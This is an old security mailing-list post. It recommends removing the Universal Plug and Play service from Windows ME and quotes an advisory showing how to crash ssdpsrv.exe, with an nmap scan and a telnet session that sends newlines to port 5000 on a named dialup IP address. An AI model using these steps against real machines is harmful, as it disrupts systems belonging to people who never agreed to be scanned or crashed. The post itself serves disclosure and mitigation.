This is a cross post out of general interest to security basics. Firstly you have to wonder why someone is running this service. I personally only found out after using a ports traffic analyzer. I will pass the url for the program on if you want it but do not want to be seen to plug if against the rules of the forum. :-)
Secondly Windows Millenium installs the service without telling you that it has done so when you do a basic install. Remove it using Control Panel, Add/Remove progs ,windows setup. communications, ckick on Universal plug and pray, (sic) and then apply. At 19:46 17/10/2001 -0500, you wrote: >By connecting to a computer running Ssdpsrv you are able to crash the >Ssdpsrv server. > >Ssdpsrv.exe is the file that starts the UPnP server on WindowsME boxes. >This service comes standard with the WindowsME installation. > >The Ssdpsrv.exe server is started at boot. >Here is the registry entry: > KEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersoin\RunServices >Here is the file that starts the server: > c:\windows\system\ssdpsrv.exe > >For information about UPnP go here: > http://support.microsoft.com/support/kb/articles/Q262/4/58.ASP > >Upon running a scan on a computer running the server I get the following: ><snip> > bash-2.05$ nmap -sT 165.121.234.217 > Starting nmap V. 2.54BETA29 ( www.insecure.org/nmap/ ) > Interesting ports on user-2injqmp.dialup.mindspring.com (165.121.234.217): > (The 1547 ports scanned but not shown below are in state: closed) > Port State Service > 139/tcp open netbios-ssn > 5000/tcp open fics > Nmap run completed -- 1 IP address (1 host up) scanned in 14 seconds ></snap> > >Method to crash Ssdpsrv: > Connect to the computer on port 5000. > Send 3 to 5 newline characters. > You then get an error and are disconnected. ><snip> > bash-2.05$ telnet 165.121.234.217 5000 > Trying 165.121.234.217... > Connected to 165.121.234.217. > Escape character is '^]'. > > > > HTTP/1.1 400 Bad Request > > Connection closed by foreign host. > bash-2.05$ ></snap> > >Here is the error caused by the crash: > Ssdpsrv has caused an error in MSVCRT.DLL. > Ssdpsrv will now close. > If you continue to experience problems, > try restarting your computer. > >This causes the server crash and closes port 5000. >Either you must restart the server by manually running ssdpsrv.exe >or reboot. > >shouts to pulltheplug #c. >:o > >_________________________________________________________________ >Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp All the best Alan Alan J Wright B.Sc(Hons)(Open) SMS +47624462772. Email [EMAIL PROTECTED] [EMAIL PROTECTED] 'You're a feisty little one but you'll soon learn respect' Return of the Jedi
